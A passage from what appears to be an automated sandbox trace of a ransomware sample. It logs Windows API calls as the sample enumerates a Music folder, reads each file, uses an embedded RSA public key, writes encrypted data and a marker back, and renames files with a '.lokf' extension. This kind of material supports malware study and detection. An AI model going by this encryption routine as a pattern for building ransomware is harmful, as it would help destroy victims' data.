lpFileSize=0x9f4fb40*=58417) returned 1 [0058.974] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.976] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe40b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.977] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.977] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xe431, lpOverlapped=0x0) returned 1 [0058.978] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.978] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.978] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.978] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8940) returned 1 [0058.978] CryptCreateHash (in: hProv=0x6b8940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.978] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.978] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.978] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.979] GetLastError () returned 0x0 [0058.979] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.979] CryptReleaseContext (hProv=0x6b8940, dwFlags=0x0) returned 1 [0058.979] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.979] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.979] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.979] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.979] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.979] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0058.979] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe431, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.980] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.980] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0058.980] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.980] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0058.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0058.980] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0058.980] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.980] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.980] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0058.980] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.980] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.980] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.980] CloseHandle (hObject=0x5cc) returned 1 [0058.981] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0058.981] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.981] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0058.981] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\cwxc45T02ajINP1wUK.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cwxc45t02ajinp1wuk.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\cwxc45T02ajINP1wUK.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cwxc45t02ajinp1wuk.wav.lokf")) returned 1 [0058.981] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.981] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.981] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.982] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0058.982] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0058.982] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.982] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.982] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.983] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned=".ini" [0058.983] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0058.983] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f5fb960, ftCreationTime.dwHighDateTime=0x1d4d2cd, ftLastAccessTime.dwLowDateTime=0x6871d5a0, ftLastAccessTime.dwHighDateTime=0x1d4d342, ftLastWriteTime.dwLowDateTime=0x6871d5a0, ftLastWriteTime.dwHighDateTime=0x1d4d342, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eIv9rDB", cAlternateFileName="")) returned 1 [0058.983] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.983] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0058.983] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.983] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0058.983] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.983] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71884ac0, ftCreationTime.dwHighDateTime=0x1d4cca3, ftLastAccessTime.dwLowDateTime=0x8fe086e0, ftLastAccessTime.dwHighDateTime=0x1d4c74e, ftLastWriteTime.dwLowDateTime=0x8fe086e0, ftLastWriteTime.dwHighDateTime=0x1d4c74e, nFileSizeHigh=0x0, nFileSizeLow=0xa78b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="klr3tCyH3.wav", cAlternateFileName="KLR3TC~1.WAV")) returned 1 [0058.983] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.983] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.983] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.983] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\klr3tCyH3.wav") returned=".wav" [0058.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\klr3tCyH3.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\klr3tcyh3.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.983] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=42891) returned 1 [0058.983] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.985] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa765, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.985] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.986] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.986] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xa78b, lpOverlapped=0x0) returned 1 [0058.986] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.987] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.987] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.987] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0058.987] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.987] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.987] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.987] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.987] GetLastError () returned 0x0 [0058.987] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.988] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0058.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.988] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.988] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.988] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa790) returned 0x9c83710 [0058.988] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82f08 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b2f8 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82f50 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b310 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b340 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b358 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0058.988] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0058.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b340 | out: hHeap=0x660000) returned 1 [0058.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b358 | out: hHeap=0x660000) returned 1 [0058.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b358 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b340 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b358 | out: hHeap=0x660000) returned 1 [0058.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b340 | out: hHeap=0x660000) returned 1 [0058.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0058.989] GetCurrentThreadId () returned 0x9e0 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7d658 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.990] GetCurrentThreadId () returned 0x9e0 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0058.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b340 [0058.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0058.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, 